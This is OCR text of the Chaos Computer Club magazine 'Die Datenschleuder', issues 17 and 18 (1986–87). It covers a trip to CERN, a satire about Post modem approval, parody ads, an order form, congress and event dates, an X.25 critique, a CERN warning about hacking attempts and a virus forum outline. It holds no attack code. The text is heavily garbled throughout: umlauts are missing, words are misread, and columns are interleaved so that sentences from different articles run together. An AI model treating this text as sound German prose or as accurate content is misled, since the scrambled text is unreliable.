Datenwelt zu offenbaren. Wir lieen also den blichen Senf von Vernetzung, Technik, Post, Fun und so ab, pilgerten Uber die lange Leitung nach CERN, dem Mekka der Hacker, und demonstrierten dort noch ein bichen BettNett. Der Vortrag selbst verlief recht ordentlich, wie mir schien. Ich selbst An diesem Punkt wre vielleicht zu bemerken, da dieses fr eine derartige Reiserechtbemerkenswert ausgestattet ist Es besitzt nicht nur Sitze fiir Fahrer und Beifahrer sowie zwei weitere Personen der technologischen Zukunft, sondern auch ein eingebautes Digitalvoltmeter, diverse Antennen und eine gut zugreifbare Gertesteckdose fr TV, Amateurfunkgerte und'optionales digital equipment (im). Eine zweifarbige Leuchtdiode zeigt stets den Betriebszustand der Aggregate an, deren Nachrichten zu verstehen, ich jedoch mangels ausreichender Morsekenntnisse, nicht in der Lage war. Es vergingen einige Minuten Fahrzeit bis wir in Mnchen eintrafen um uns ein Quartier filrdleNacht zu suchen. Mil freundlicher Hilfe der Kollegen von der B.H.P. lie sich relativ schnell eine komfortable bernachtungssttte in einem Rehabilitationszentrum am Rande der Stadt ausfindig machen. Am nchsten Morgen gerieten wir aufgrund bisher ungeklrter Ursache erneut auf die Autobahn, die uns ohne Umwege an die sterreichische Grenze leitete. Nun wurde vieles anders. Das Essen auf den Raststtten winde deutlich besser, auch der Geldsack konnte sich etwas von den klner Strapazen erholen. Die pnmre Euphorie, wurde jedoch schon nach wenigen K metem durch den rger ber die Straenverhltnisse kompensiert. Auer einem Vergrauten Verkehrsschild lie kaum noch etwas darauf schlieen, da wir uns auf einer Autobahn be- verlor nur zweimal den Faden und drehte nur eine einzige fanden. Der bergang zwischen Autobahn und Kiaulacker Schleife in meinem Konzept Auch der Veranstalter zeigte sich wurde durch regen Regen zunehmend flieender. Die erste zufrieden. Nach dem Vortrag giflete noch irgendein konserBegegnung mit der Zivilisation des Zielgebietes hatten wir auf vativer Zwerg aus der Reihe mitte rechts, da das doch aber einer Autobahnraststtte ca50 K meier vor Graz. Dort kmpf- alles illegal und destruktiv sei, konnte sich aber mit dieser te eine ganze Armee sterreicher mit einer nicht zu ffnenden Ansicht nicht ganz durchsetzen. Ein erfreulicheres Erlebnis Kaffeemhle. Sie hatten die Maschine mittels eines Vorhn- war da schon, einige alte Bekannte zu Gesicht zu bekommen: geschlosses gegen den Zugriff unautorisierter Wesen zu die ausgesprochen nette, durch Zweiradfahrt etwas durchsichern gesucht, was unweigerlich dazu fhren mute, da die gefrorene Schwester unseres Chefredakteurs und desselben Sicherungen den autorisierten Benutzern den Zugriff ver- Mitbewohner eines hamburger Appartements. Auf der Rcksperrten. Ich halle es fr hchst zweifelhaft, anzunehmen, da fahrt waren uns sterreichs Wettergtter erheblich wohlgesich ein unautorisierter Benutzer durch eine derartige Si- sonnener, wodurch wir eine etwas wohlbesonntere Heimkehr betreiben konnten. Nach dem obligatorischen berfall der cherung von seinem Vorhaben htte abbringen lassen. Mittlerweile hatte sich der Wasserstand im Chaos-Mobil de- Straenruber (Mautgeldjger) trafen wir erneut in Mnchen ein. Dort plauderten wir nachmittags noch etwas mit dem rart dramatisch erhht, da eine Gefhrdung der technischen Einrichtungen nicht mehr auszuschlieen gewesen wre, Boxmanager KR" von Markt & Technik, versuchten unseren wenn wir nicht den Unterboden mit einem Loch versehen Greuel einzufangen, stieen dabei nur auf eine verschlafene htten. Mit der blichen Przision durchschlugen wir den Hackersfrau, und muten die Stadt doch unverrichteter Dinge Fahrzeugboden mittels eines Spezialwerkzeuges (CCC ge- verlassen. Pnktlich um sieben Uhr morgens konnte unser nuine part No. 1254/VSM), so da einflieendes Regen wasser Chaospostler Clinch wieder seinen Dienst bei der Bundespest (ER) und ausflieendes Schmutzwasser (AS) sich exaki nach in Hamburg antreten. Vlc. Datenschleuder 11

Datenschleuder 10

Messerscharf geschlossen - der Mann meint 'ne NUI. Aber sowas ham wer doch schon. Wir setzen dem Herrn auseinander, da wir tatschlich das haben wollen, was wir bestellt haben. Damit ist dann vorerst wieder Ruhe. Es ist Juli geworden. Die Mailbox luft mittlerweile auf dem PC, allerdings immer noch mit der eigenwilligen Abhebemechanik. Die Post scheint ab und zu noch ein paar Rckfragen zu haben, erkundigt sich, welche Modems man denn nun gern htte und erhlt besttigt, da man tatschlich an den bestellten Gerten festhlt Man liefert eine Kurzbeschreibung der Katze", daraufhin Schweigen am anderen Ende der Leitung, dann ein unfrohes Naja". Keine drei Wochen darauf ein weiterer Anruf: Mein Kollege hat Ihnen doch schon vor zwei Wochen gesagt, Sie sollen Ihr Modem abklemmen usf..." Der Versuch, auch diesem Herrn klarzumachen, da man kein Modem benutzt, sondern einen zugelassenen Koppler, scheitert an dessen Selbstbewutsein. Nehmen Sie das Ding ab oder Sie haben morgen frh die Betriebssicherung im Haus. Die Modems kriegen Sie dann Anfang August." Betrbt steckt man seine Katze" ins Krbchen und stellt den Box betrieb ein. Istja nur fr ein paar Tage. AufderDatex-Seite regt sich pltzlich auch was: Im Briefkasten ein Krtchen mit der Bitte, den Baubezirk anzurufen. Ein Teilwunder geschiehtT Mitte Juli werden die Strippen fr den Anschlu gelegt. Von den dazu bentigten Modems keine Spur. Dafr am nchsten Ein postmodernes Melodram Tag ein Brief mit .....knnen wir ihnen keine Anschlugenehmigung erteilen..." Zwischenzeitlich gelingt es dem Antragsteller, den schriftlichen Nachweis zu erbringen, da er in Es begab sich aber zu dieser Zeit, da ein Gebot ausging van der Lage ist, seinen eigenen Computer auch selbst zu unterdem Postmimster, da alle Modems amiens abgeschtzt halten wie es die Bestimmungen erfordern. werden." Die Tage ziehen ins Land, bis Anfang August die langerSo htte der Chronist die Talsache beschrieben, da Zusatsehnten Auftragsbesttigungen fiir die Femsprechmodems zeinrichtungen zur Datenfernbertragung, kurz MoDems geeintrudeln. Voraussichtlicher Anschlutermin: 12. August. nannt, der Zulassung durch das Femmeldetechnische ZenDas nchste Teilwunder Auch die Anschlugenehmigung fr tralamt (FIZ) in Darmstadt bedrfen. Keinesfalls darf man Datex-P kommt an. Es Folgt Stille bis zum 11. August, an dem bekanntlich Gerte ohne Zulassungsnummer, oder gar - ein der Antragsteller bei der Rckkehr von der anstndigen Arbei t Frevel - selbstgetpferte Konstruktionen a la Datenklo ohne eine Karte im Kasten vorfindet. Offenbar waren die Herren den Segen der Post an das Femmeldenetz anschlieen. Das vom Baubezirk morgens dagewesen. Baubezirk anrufen, fhrt, so man Besitzer eines Computers ist, dem die Post nicht neuen Termin vereinbaren. Und siehe da: die Strippen werden die selig machende allgemeine Zulassung erteilt hat, oft zu gezogen, Anschludosen gesetzt- und das wars schon wieder. abenteuerlichen Eigenbauten (AE). Diese AE umgehen die Nochmal Baubezirk anrufen. Damit ham wir nichts zu tun, postalischen Bestimmungen einfach dadurch, da sie den das is 'ne andere Dienststelle..." Die zustndige Dienststelle Einfallsreichtum der Verfasser der Fernmeldeordnung berkonstatiert neuen Sand im Getriebe: Die Kollegen haben bei treffen und somit in derselben gar nicht erwhnt werden. Ihnen AD08 gesetzt (das sind die alten Dosen mit 8 KontakWir denken hier vor allem an die letzthin beschriebene Katten). Fr Ihre Modems brauchen Sie aber TeAe (das sind die, ze", die rein mechanisch das Abheben des Telefons besorgt. mit denen z.B. dasDBT03 angeschlossen wird), das mu erst Ein solches Gerat hat den Vorteil, da man damit relativ noch gendert werden." Wie auch anders. ruhigen Gewissens auch auf einem C 64 eine Mailbox beBaubezirkanrufenTerminvereinbaren. Nachdem die Dosen treiten kann. Mit dem Nachweis, da eine solche Katze" ausgewechselt sind: Anruf beim Fernmeldeamt 4, nachhaken nichl den Vorschriften entspricht, tut die Post sich ziemlich in der Modemfrage. Doch daseidiePostvor.esfehlenja noch schwer. Beharrlichkeit fuhrt hier oft zum Ziel, denn die Kat- die Dalentelefone. Die bringt wieder eine andere Dienststelle. ze" ist so konstruiert, da sie eben und eben nicht in der Nach einer Safari durch den Postdienststellendschungel komFernmeldeordnung verboten wird. men auch die Datentelefone angekrochen. Man beginnt der Hat man sich irgendwann dazu aufgerafft, einen neuen Rech- Ansicht zuzuneigen, da unier den Urahnen der Postbeamner nach dem von Incredibly Bad Machines gesetzten Stanlenschaft zwar nichl der Erfinder des Rads zu finden ist, dard zu erwerben, denkt man beim Kauf natrlich auch daran, mglicherweise aber der Erfinder der Bremse. da viele dieser Gerte eine FTZ-Nummer (amtlichen Am 10. September hebt sich der Vorhang zum vorerst letzten Automaten-Taufschein) haben und gibtdankbarein paar Mark Akt des Melodrams: Die Modems werden angeschlossen. mehr dafr aus. Endlich darf man mit dem Segen der Post ein Dabei stellt sich heraus, da die Datentaste an den Telefonen Modem betreiben. Also auch seine Mailbox endlich auf den nicht funktioniert, was man aber als Nebensache hinnimmt. Boden der FDGO stellen, sprich legal arbeiten. Und wenn man Schlielich hat jedes Modem noch eine eigene Dateniaste, und grade so schn am Planen ist, kommen einem auch die wun- man will ja eh hauptschlich ankommende Rufe beanswem. dervollen Mglichkeiten des Datei-Dienstes der Post in den In aller Ruhe werden noch zwei V24-Kabel zusammengeSinn. braten. Fnf Monate nach Antragstellung, und zwei Monate Also wird ein Antrag beantragt. Kaum zehn Tage spter, sagen nach Beginn der Zwangspause, kann die Box wieder online wir Anfang Mai, kommt Post von der Post. Antrge fr gehen. Der einzige Unterschied zwischen dem alten Betrieb Modems und ftlr Datex-P-Haupianschlllsse. und eine Liste der vermittels Katze" und dem neuen mit Postmodem: 100 DM. verfgbaren Modems. Nun, man wei sowieso, was man will, Soviel kosten die Modems pro Monat. Modems 2111200 und 300 Baud, umschaltbar, und dann noch Achja, der Datex-An Schlu. Er wurde bislang noch nicht funktionsfhig bergeben. Aber wir haben ja erst Ende Sepein Hauptanschlsschen fr Datex-P20. Und ab die Post Die Wochen ziehen ins Land. Nichts rhrt sich. Irgendwann tember. dann ein Anruf von der Anmeldestelle: Sie haben hiereinen Antrag atifeinen Data-Hauptanschlu gestellt. Wollen Sie das wirklich, oder wollen Sie nur eine Softwarekennung? " gobiin

v^

rv,.

Die Bratenschleuder
Gastrokybernetische Appetithappen

Es

it

so

weit: Plus H H Salatverarbeitungsprogramm

Tomatomat Erstes

Deutsches

Postmodemballade

automatischer Einzelblatteinzug (Chicoree und Chinakohl optional) a u t o m a t i s c h e r S a u c e n u m b r u c h am S c h s s e l r a n d 144 verschiedene Gewrzarten und unterstrichener Genu Implementierte Schnittstelle zur Beilagenverarbeitung (INTERFRESS) zwanzig Krutertasten frei definierbar frei d e f i n i e r b a r e Fruchtsequenzen fr O b s t s a l a t e selbstregenerierbare Schnitzelstze P r o p o r t i o n a l d e k o r a t i o n auf Tellern mit S c h n i t z e l s a t z d o w n l o a d z u m B e i s p i e l OKIGAG, YAHAMHAM und Hausknecht. Farbdarstellung auf Gabelmatrixgerten, EAT-CHAT'S und Mikrowellenprintern. E r s t e l l u n g v o n K h l d a t e i e n fr P i c k n i c k u n d C a m p i n g Auto-Scratch bei berschrittenem Haltbarkeitsdatum

Saitware: 1-2-dry

Quartalsaufprogramm bertragung seriell oder ber Breittrinkkabel mehrbenutzerfhig durch Kanalsharing grafikfhig, 3D-Promilleanzeige Grhlgenerator verschiedene grafische Ausnchterungsmuster

Trink Tea

Tank Base I

multitassing teatimesharing verschiedene Teezeremonien einprogrammiert d a t e n k o m p a t i b e l z u S A M O W A R - S T A R v o m VEB S u b i t n i k . integriertes Wasserprfprogramm S o r t e n a u t o m a t i k Earls Cray mit beschleunigtem Regalzugriff Mischroutine Darjee-Llrik selbst anpassender Kochprozessor HOT-1 zukunftssicher durch Gasbetrieb Datex-T Fernwrmeadapter

Datenschleuder 12

Datenschleuder 13

Chaos Computer Club Bestellfetzen


Tatwerkzeug Computer von Ernst Schnarrenberger Moewig Sachtaschenbuch D M 9.80 I S B N 3-8118-3210-7 Erinnerungen an die Zukunft

Hiermit bestelle ich folgende(s) an unerfll- und (un)verpackbaren Sachen: cccvw cccfl cccnl cccsl dspe dsfl dsnl dssl dshl dsklO dsabh pvt 20, .00 DM 230, .00 DM 120, 00 DM , 60, .00 DM 2, 50 DM . 100, ,00 DM 60, .00 DM 30, .00 DM 35, .00 DM 3, 33 DM 3, 33 DM 990 DM Total ========= Einmalige Rufnahmegebhr

Krimi" schrie mir ein Chaot entgegen, nachdem er die ersten Seiten dieses Buchs gelesen hatte. Leider hat er recht. Nach dem Prinzip Quellenangeben, was ist das ?" schildern die Autoren einige Flle von Computerkriminalitt, unter anderem auch den Hacking-Fall eines Dipl.Ing. Dabei vergaen sie jedoch fast immer, ihre Quellen zu dokumentieren. Nur in einigen wenigen Fllen rafften sie sich dazu auf, auer dem Zeitungsnamen auch das Datum oder die Ausgabennummer bekannt zu geben. Da nichts wirklich drinsteht, auer da die B H P zur Kultzeitung erhoben wird, verschwendetes Geld. Ls 4007

..Positronische Systeme sind unfehlbar. Sie knnen sich selbst kontrollieren. Sie erkennen jeden unbefugten Eingriff." So hat man es uns in den Schulen gelehrt", bernahm Folly das Wort. Wir Byte-Jger wollen versuchen, das Gegenteil zu beweisen. Wir haben viele Vorbilder in der Vergangenheit. Eines davon stammt aus dem Dezember des Jahres 1984 der alten Zeitrechnung. Da hat eine Gruppe junger Burschen aus einer terranischen Stadt namens Hamburg das damals jngst eingefhrte BTX-System der Post geknackt und ist in unzugngliche Bankdatenverbindungen eingebrochen. Aus Jux haben diese Burschen dort eine halbe Milchstrae auf ihr Konto umgebucht." (aus: Peter Griese, Positronicspiele", in Perry Rhodan Jubilumsbaad 6, Moewig Verlag 1985, ISBN 38118-7096-3)

mehr erwnscht... Frderndes Mitglied normales Mitglied (fr 1 Jahr) Schler, Studenten oder Ahnliches (1 Jahr) Probeexemplar der Datenschleuder Frderabo der DS (mehr Geld erwnscht...) Standard-Jahresabo der DS Sozialabo der DS fr Schler oder Ahnliches Die Hackerbibel (Teil 1) incl. Porto usw. 10 Kleber "Kabelsalat ist gesund"

Computer-Teile ein t Liebeszeichen!


Wenn die Frou d e n Mann mit Hobelbank, Computer-Zusatrtellen oder anderen Dingen frs Hobby berrascht: Klarer Fall von Llebel (74 Prozent der deutschen Frauen sind nmlich eiferschtig aut SEIN Steckenpferd.

64 Kleber "Achtung Abhrgefahr" (A4 Bogen spritzwassergeschtzt) Porto, Trinkgeld usw. fr den Rest... bei 2 Stellen (vor Komma) gehts schneller das Geld liegt bei als Scheck Briefmarken Bargeld

Nur fr zuknftige Mitglieder: Ich zahle meine Mitgliedsbeitrge Vierteljhrlich Halbjhrlich Jhrlich
Zutreffendes biete ankreuzen

a _a

per Scheck Bar per berweisung auf Postgiro Hmb 5990 90-201 Einzugsermchtigung

Nur fr zuknftige Mailbox-Benutzer: Ich mchte teilnehmen an der


Zutreffendes bitte ankreuzen. Unterlagen erden zugeschickt.

Infex Mailbox (20,00 DM Eintragungsgebhr + 8,00 DM/Monat Mindestnutzung + anfallende Nutzungsgebhren) C.L.I.N.C.H. Box (5,00 DM pro Monat ohne zustzliche Zeitgebhren 2,00 DM pro Monat fr Schler u..) Alle Abonnementpreise beziehen sich auf ca. 1 Jahr, d.h. 8 Ausgaben. Alle Mitgliedsbeitrge gelten ebenfalls fr 1 Jahr. Mitglieder erhalten die Datenschleuder als Abonnement gratis. Spenden werden jederzeit dankend entgegengenommen!!!
IMPRESSUM Die Datenschleuder 17 Dezember 1986 Das Wissenschaftliche Fachblatt fuer Dattnreisende D-2000 Hamburg 20 Sehwenckestrasse 8$ Ceonet: Ceo 1: Chaos-Team . Btx : * * * 5 5 3 2 1 # C . L . I . N . C . H . : 040 632 3517 Tuwnawm Herausgeberund V I S d P G : Herwart Holland-Moritz Mitarbeiter dieser Ausgabe (u.a.): R.Schrutzki, A.Eichicr. P.Franck, H.Gruel, M.Kuehn., S.Stahl, C H W , e pi/2, C . M l l e r , T.Lange, Andy M . - M . , S.Wernery, Poetronic

Adressfeld
Name

Vorname Hilfszeile Strae Ort Elektronische Adresse Datum: Hier Unterschrift:

Ohne Adressaufkleber mindestens 1,00 DM Trinkgeld

Datenschleuder 14

!e

datenschleuder N r , 17 * Dezenber 1986 * Postvertriebsstck C9927F * Geb. bei, D M 2,50 Postvertriebsstck C9927f
D i e D a t c n s c h l c u d e r Nr. 1 8

Das wissenschaftliche Fachblatt fr Datenreisende Ein Organ des Chaos Computer Club

Februar 1987

a m

2 8.

u n d

29.

Dezember

C h a o s

Comunicati on Congress

Eidelstedter Brgernaus ElbGAUstrae 12 2000 Hamburg 54

Congressbeglnn:

Sonntag,

den

28.Dezember

19 8 6 ,

09.00

Uhr

DA"? T r e l l e n l r D a l e n r e i s e n d e l T e l e f o n , D A T E X , B T X , T e l e x , Online - Mailbox, Datentunk, Videos, Klnschnack, und..und... UofSere T h e m e n d i e s e s J a h r u n t e r a n d e r e m : Computerviren, M-onltora abhren, D a t e n s c h u t z , D a t e n l r u s l , Datanlust, Computer im B u n d e s t a g , Quo v a d l s M l l b o x u.y.v.v.v.a.... Und wie Immer dabei: Chaos-Cafe, Chaos-Archiv, Hackcenler und n a t r l i c h der t r a d i t i o n e l l e I n t e r n a t t o n a l e Frh S c h o p p e n mit tOnl H a c k e r n aus sechs Lndern. Eintrittspreise: Mitglieder 1 5 . - , private Teilnehmer Presse 5 0 . und gewerbliche Teilnehmer 150.1/oranmeldung durch berweisung beim PostGlrosAmt Hamburg. aul Konto 59 90 20.-,

The Ultimate Message Error


... und weitere Neuigkeiten aus der Magnetic Media Metropolis

90

201

Chaos Computer C l u b e. V Schwenckestrae 85 2000 Hamburg 20


T e l e t o n 0 4 0 / 4 9 0 37 57 BTX: 655322 W i l l a r i Informillonan lauland In d i r CLINCH - Mailbox Hamburg
049 / S3! H 17 und D a l a - P 44 4 0 00 9 0 III

A count:

Ergebnisse des CCC'86:

Dokumentation:

F < (Ol >

,|lbMn!f

Volkszhlung NETWEAVING & Real Hacking Computer Viren


Datenschleuder 16

Hacker-Meet in gs
Wichtige Termine 1987 CEBIT - Hannover 04.03.-11.03. Hackertreff Dienstag 16 Uhr am grsstem Poststand, sonst siehe Btx Programm. 18.04.-19.04. CCC - Hamburg (Eidelstcdter Brgerhaus) II. PC Vircnfonim. Aufarbeitung der Erkenntnisse, Diskussionen und Workshops (Anmelden!). CCC - Hamburg (Eidelstedter Brgerhaus) Ordentliche Mitgliederversammlung des CCC e.V. C'87 - Kln Hackertreff tglich beim WDR Computerclub, sowie Dienstag 16 Uhr am Poststand. IFA - Berlin Hackertreff Dienstag 16 Uhr am Postsland, sonst siehe Btx-Programm. CCC - Hamburg (Eidelstedter Brgerhaus) Wochenend-Workshop des CCC, Thema noch offen. SYSTEMS - Mnchen Hackertreff Dienstag am grsslem Posts tand, sonst siehe Btx-Programm der BHP. CHAOS COMMUNICATION CONGRESS 1987-Hamburg Die europische Hackerparty im Eidelstedter Brgerhaus.

1ST Hack
Schon whrend der Aufbauphase des CCC'86 gluckte der erste Hack: Bei Forschungsarbeiten in einem heimischen Grorechner Marke VAX wurde ein Kleinverzeichnis von Computerinstallationen in Moskau, zuzglich Seriennummern, gefunden. Unter anderem steht dort "I CBM 8032 und I CBM 8250" sowie "1 Tte mit Bauteilen", wau

Datcx-P: Auslsung
Entwicklungsfehler

18.04. 11.06.-14.06.

Wenige haben es noch nie erlebt: Auf einmal bricht die Verbindung zusammen, ja, es scheint sogar so hufig vorzukommen, da schon "Ansagetexte" wie

Hacker Erinnerung und Warnung

28.08.-06.09

PATEX-D: Auslsung - Veranlassung durch Durchfall PATEX-POO: Einlsung - Veranlassung durch Zufall im GeoNet zu finden sind. Warum das passiert, liegt hufig daran, da durch bertragungsstrungen die zwei an einer Pakctiibcrmittiung beteiligten Reclincr total aus der Synchronisation laufen, d.h. jede Seite "vermutet" etwas falsches ber den Zustand der anderen Seite. Unglcklicherweise ist nun das X.25 Protokoll, der internationale Standard fr viele Strecken im Pakctnetz, so konstruiert, da es nicht selbstsynchronisierend ist. Eine Paketubermittlung mit X.25 ist in einem labilen Gleichgewicht; zu Beginn der bertragung werden spezielle Initialisierungspakcte ausgetauscht, die nur einen eindeutigen Zustand herstellen, wenn die Scnde/Empfangspuffer auf beiden Seiten geleert sind. Resultat: Nach dem Herstellen einer virtuellen Verbindung "vergit" das Netz manchmal, welche Pakete schon "abgeliefert" sind. Resultat: DATEX-P: Auslsung - Ablauffehler Die Grnde dafr sind historischer Natur: X.25 wurde aus dem IBM SDLC (Synchronous Data Link Control) heraus entwickelt/bernommen. Dabei haben sich in den X.25 Standard Strukturen aus SDLC Tagen eingeschlichen, dieinzwischen vollkommen sinnlos sind; andere, fr eine Resynchronisierbarkeit notwendige Informationen, werden jedoch nicht beimittelt. Dies ist bei der Weiterentwicklung und Benutzung von X.25 erkannt worden und fhrte zur Erfindung von immer neuen, speziellen "Steuerpaketen". Kuiz: Ein typisches Beispiel fr einen im GRUNDE vermurksten Kommittee-Entwurf, der auch durch Einziehen immer neuer Sttzbalken nichtrichtigerwird. Folge: Ein Alptraum an Komplexitt und Sonderfallbehandlung fiir jeden Systemprogrammiercr, der ein X.25 Protokoll implementieren mu. Zustzlich ist der Wortlaut in den CCITT Dokumenten so vieldeutig, da Implementationen, die sich an den Text gehalten haben, inkompatibel sind. Fr eine ins einzelne gehende Kritik und - vor allem einen konstruktiven Vorschlag fr ein selbstsynchronisicrendes Protokoll (in Pscudo-Pascal), das sehr einfach zu implementieren ist: "Scrial Link Protocol Design: A Critiquc of the X.25 Standard, Level 2" by John G. Flctcher, Lawrence Livermore Lab. erschienen in einem Konferenzbcricht der SIGCOMM (ACM) 1984 "Communications Architectures & Protocols" KS
D3 Saite Drai

12.09.-13.09. 19.10.-23.10.

28.12.-29.12.

(Gruppenleiter, CERN-DD/CS, Sektion N)

Weitere Hinweise in den Btx-Programmen: CCC bundesweit 655321# CAC Regionalbereich 17*920163 BHP Regionalbereich 32 *920492()4# LS23 - hacker.txt

von Giorgio Heimann

Zukunfts Werksttten 1987


im Rahmen des Programms 'Mensch und Technik sozialvetrgliche Technikgestaltung' des Landes Nordrhein-Westfalen. Anmeldung bei: Zukunftswerksttten, Nesenhaus 17,4030 Ratingen 6 20.- DM als Scheck oder bar beifgen. 27.02.-01.03. DIE VERKABELTE FAMILIE - CHANCEN, PERSPEKTIVEN UND GEFAHREN in Kerken ZWISCHEN VIDEO UND COMPUTERNETZEN POLITISCHES LERNEN MIT NEUER TECHNIK in Soest FORUM ZU MENSCHENGEMER INFORMATIONS- UND KOMMUNIKATIONSTECHNIK in Kln MEDIA-PARK KLN - STADTTEIL FR MODERNE TECHNOLOGIE, LEBENS-, LERN- UND ARBEITSQUALITT in Kln ZUKUNFT DES LEHRENS UND LERNENS IN EINER VON TECHNIK GEPRGTEN WELT in Leichlingen NEUE MEDIEN UND BRGERMITWIRKUNG IM KOMMUNALEN BEREICH in Marl WELCHE VORTEILE BRINGT DIE BILDSCHIRMARBEIT DEN FRAUEN? in Bielefeld (NUR fr Frauen - fr Kinderbetreuung ist gesorgt) DER HARTE UND DER SANFTE WEG? Wege zu einer sozial vertrglichen Technik in Berg. Gladbach

09.03. - 11.03.

20.03 23.03. - 27.03. 30.04. - 03.05. 15.05. - 17.05. 29.05.-31.05.

"Wir leiden noch immer tglich unter Attacken von Hackern. Zur Zeit knnen wir an einigen VAXen der CERN ungefhr 20 "Einbruchsversuche" tglich beobachten. Obwohl wir uns mit Hilfe der CERN-Rechtsabteilung darauf vorbereitet haben, die Schweizer PTT einzuschalten, um herauszufinden, welche Aktionen mglicherweise gegen diese Leute unternommen werden knnen,bestehen wirjedoch nach wie vor auf dem Prinzip, da jedes System sich selber zu schtzen hat. Dies ist die einzig sinnvolle Lsung, da es einen sehr viel differenzierteren Schutz ergibt: auerdem verlagert diese Strategie die Verantwortung zum Schutz der Betriebsmittel dahin, wo sie hingehrt, nmlich zum Eigentmer der Betriebsmittel. Neben "externem" Hacken haben wir vor einigen Wochen einen Fall einer internen Attacke gehabt. Der Ausgangspunkt des Vorfalls wurde zurckverfolgt und die verantwortliche Person konnte identifiziert werden. Wir beschlossen, diesen Vorfall zu vergessen, da in diesem speziellen Fall keinerlei bser Wille im Spiel gewesen war. Wir muten aber eine Menge (rarer) Arbeitskraft fr die Suche verplempern, so da unsere Aufmerksamkeit von unseren eigentlichen Aktivitten und der berwachung von ernsteren und bswilligeren Attacken abgezogen wurde. Deshalb seien alle CERN-Benutzer gewarnt, da wir in Zukunft mglicherweise mit ernsthafter Verfolgung gegen Leute vorgehen, die fr "Hack-Attacken" verantwortlich sind."
A u s : " M i n i & M i c r o C o m p u t e r Newsleiter", Dec. '85: bersetzung: T. Twiddtebit

19.06. - 21.06.
DS Saite Zwai

feie

SntcnSdjtciiicr

SnfcnStfjlcutice

Strahlengefahr
aus dem Telefon Wir berichteten in der letzten Ausgabe (ds 17) ber ein neues Leistungsmerkmal der Gebhrenzhler in Posttelefonen. Inzwischen beschftigt sich der Bundesbeauftragte filrden Datenschutz (BfD) mit diesem Phnomen. Festgestellt wurde, da alle mechanischen Gebhrenzhler (herkmmlicher Bauart, ca. 1,3 Mio.) einen Fehler im "Begrenzverstrker" aufweisen und dadurch (in Toleranzgrenzen) im Langwellenbereich das Gesprch wie ein Sender ausstrahlen. Dieses Signal wurde mit guten Empfngern beim FTZ noch in 40 cm Entfernung gemessen. Inwieweit metallische Leitungsfhrungen (z. B. Heizungen) dieses Sendesignal weiterleiten und dadurch die Reichweite verstrken, wurde noch nicht bercksichtigt. Eine Austauschaktion der betreffenden Gebhrenzhler erscheint dem BfD im Verhltnis zum Aufwand nicht angemessen. Vielmehr sollten alle betreffenden Fernsprechteilnehmer ber diesen Umstand informiert werden. Desweiteren ist es zu berdenken, die Strstrahlenverordnungen fr zuknftige Entwicklungen anzupassen. Bisher entsprechen die "strahlenden" Telefone diesen Vorschriften. Strahlende Fernsprechteilnehmer erhielten bisher kostenfrei Ersatzgerte. Derzeit luft gerade eine Bundestagsanfrage derGRNEN zu diesem Thema, ber deren Ausgang wir berichten werden. LS23
S T R A H L 1 8 . D O C 19870131 2053

frderte den Namen des himmelschreibenden Piloten zutage. Dieser, gerade wieder festen Boden unter den Fen, zeigte sich eher belustigt ber die Interpretation des Hauses dpa. Er habe die Telefonnummer 611061 an den Himmel geschrieben, und das wre die Rufnummer einer Hamburger Taxizentrale. Da htte dpa wohl einen etwas falschen Standpunkt gehabt und die Zahlen verdreht. Wer da nun was hinter die Rufnummer 190119 geklemmt hat, ist bis zur Stunde unbekannt. Wie aus gut unterrichteten Kreisen verlaute!, wurden erste Recherchen angeleiert. Mglicherweise handelt es sich aber auch nur um ein einfaches Telefax-Gert... jwi
D P A H A K 1 8 . D O C 19870131 2000

Chaos Communication Congress

Das PC-Virenforum Eine Dokumentation in fnf Teilen


von Steffen Wernery

Stellenanzeige

Teil 1 - Virus G r u n d l a g e n , ein geschichtlicher Rckblick Teil 2 - PC-Virus G r u n d l a g e n (basierend a u f M S - D O S )

Wir stellen 1:

Teil 3 - Der D e m o v i r u s fr M S - D O S Teil 4 - Juristische Hinweise

- Buchhalter(in) - Datatypist(in) - Programmierer(in) fr C , Pascal, Basic, 68000 Assembler - Chefsekretr(in) - Postbearbeiter(in) - Archivar(in)
Aber nicht etwa sechs Einzelpersonen, sondern EINE fhige Kraft, die das alles zusammen kann, ohne nach 46.983 Sekunden (bisherige Bestleistung) einen Zusammenbruch zu erleiden. Wir sind ein aufstrebender Verein von Computerchaoten auf der Suche nach den Problemen, fr die wir jetzt schon Lsungen haben. Wir bieten:

Teil 5 - Thesen u n d Ansichten

DPA hackt
Tief versunken in der Arbeit werkelte am Dienstag, den 9. Dezember 86 die G.ID.-Redaktion (Genethische InformationsDienste; die biologische Datenschleuder) an ihrer nchsten Ausgabe. Pltzlich schrillte das Telefon. Eine Mitarbeiterin der Deutschen Presse- Agentur hatte am Himmel ein Flugzeug entdeckt, welches eine mysterise Zahlenkombination in die Wolken ber Hamburg schrieb. Durch kreatives Betrachten konjite die Zahlenreihe 190 119 entziffert werden, wobei sich sofort der Schlu aufdrngte, es knne sich um eine Telefonnummer handeln. Das Telefon wurde angeworfen und tatschlich. DOCH AUF DER ANDEREN SEITE WAR KEINE MENSCHLICHE STIMME - sondern ein merkwrdiger Piepston. Nun sind auch dpa-Journalisten technisch versiert und schlufolgerten, da es sich um einen "Computerton" handeln mu. Sofort wurde das hauseigene Texi aktiviert und munter drauflos gehackt. Allerdings ohne Erfolg. Hilfe wurde nun von der angeblich technisch versierten G.IDRedaktion erbeten. Doch auch diese scheiterte am beschrnkten know how. Um das Gesicht zu wahren, beschlo man, das Problemfeld zu verlagern und "nichttechnische Alternativen" einzuleiten. Ein Anruf beim Flughafen-Tower DS Sails Ma

- angenehme Arbeitsatmosphre in einem typischen Feuchtbiotop - rasche Aufstiegsmglichkeiten (ein Teil unseres Archivs lagert auf dem Dachboden) IL- abwechslungsreiche Ttigkeit (jeden Tag ein anderes Dalum) - interessante Sozialleistungen (was wir uns leisten, ist wirklich sozial = gemein) - angemessene Bezahlung (unserem Konto angemessen) - eigenverantwortliche Ttigkeit (wir werden Sie schon zur Verantwortung ziehen) - gleitende Arbeitszeit (Sie haben da zu sein, wenn wir Sie brauchen) - klare Arbeitstrukturen (Sie erhalten maximal sieben widersprchliche Autrge) Wir erwarten: - keine Widerrede Bewerbungen bitte bis gestern an die Re(d)aktion; Lichtbild unntig, Lebenslauf und Referenzen unwichtig. Wer sich bei uns bewirbt hat eh keine andere Wahl. Gewerkschaftler erwnscht (sofern Mitglied der Gewerkschaft der Sklaven des rmischen Reiches), gobiin

